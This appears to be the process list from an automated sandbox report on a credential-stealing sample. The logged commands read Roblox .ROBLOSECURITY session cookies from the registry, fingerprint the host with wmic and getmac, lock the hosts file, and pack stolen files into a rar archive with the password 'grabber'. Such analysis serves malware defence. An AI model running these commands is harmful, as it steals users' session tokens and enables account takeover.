                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:85
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:86
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:7E896B29B309DE74A72DEC7D59715EFD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:87
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\getmac.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:getmac
                                                                                                                                                                                                                              Imagebase:0xcf0000
                                                                                                                                                                                                                              File size:65'024 bytes
                                                                                                                                                                                                                              MD5 hash:31874C37626D02373768F72A64E76214
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:88
                                                                                                                                                                                                                              Start time:01:19:38
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                              Imagebase:0xb0000
                                                                                                                                                                                                                              File size:19'456 bytes
                                                                                                                                                                                                                              MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:89
                                                                                                                                                                                                                              Start time:01:19:39
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:90
                                                                                                                                                                                                                              Start time:01:19:40
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:91
                                                                                                                                                                                                                              Start time:01:19:40
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:92
                                                                                                                                                                                                                              Start time:01:19:41
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:93
                                                                                                                                                                                                                              Start time:01:19:41
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                              Imagebase:0xb00000
                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:94
                                                                                                                                                                                                                              Start time:01:19:41
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:7E896B29B309DE74A72DEC7D59715EFD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:95
                                                                                                                                                                                                                              Start time:01:19:41
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:96
                                                                                                                                                                                                                              Start time:01:19:41
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:97
                                                                                                                                                                                                                              Start time:01:19:41
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:98
                                                                                                                                                                                                                              Start time:01:19:41
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:99
                                                                                                                                                                                                                              Start time:01:19:42
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:100
                                                                                                                                                                                                                              Start time:01:19:42
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:7E896B29B309DE74A72DEC7D59715EFD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:101
                                                                                                                                                                                                                              Start time:01:19:42
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:102
                                                                                                                                                                                                                              Start time:01:19:42
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:103
                                                                                                                                                                                                                              Start time:01:19:42
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x8e0000
                                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                                              MD5 hash:7E896B29B309DE74A72DEC7D59715EFD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:104
                                                                                                                                                                                                                              Start time:01:19:43
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:105
                                                                                                                                                                                                                              Start time:01:19:43
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:106
                                                                                                                                                                                                                              Start time:01:19:44
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:107
                                                                                                                                                                                                                              Start time:01:19:46
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:108
                                                                                                                                                                                                                              Start time:01:19:46
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:109
                                                                                                                                                                                                                              Start time:01:19:46
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *
                                                                                                                                                                                                                              Imagebase:0x7ff6faa20000
                                                                                                                                                                                                                              File size:630'736 bytes
                                                                                                                                                                                                                              MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:110
                                                                                                                                                                                                                              Start time:01:19:48
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:111
                                                                                                                                                                                                                              Start time:01:19:48
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:112
                                                                                                                                                                                                                              Start time:01:19:49
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:wmic os get Caption
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:113
                                                                                                                                                                                                                              Start time:01:19:50
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:114
                                                                                                                                                                                                                              Start time:01:19:50
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:115
                                                                                                                                                                                                                              Start time:01:19:50
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:116
                                                                                                                                                                                                                              Start time:01:19:52
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:117
                                                                                                                                                                                                                              Start time:01:19:52
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:118
                                                                                                                                                                                                                              Start time:01:19:52
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:119
                                                                                                                                                                                                                              Start time:01:19:53
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:120
                                                                                                                                                                                                                              Start time:01:19:53
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Target ID:121
                                                                                                                                                                                                                              Start time:01:19:53
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
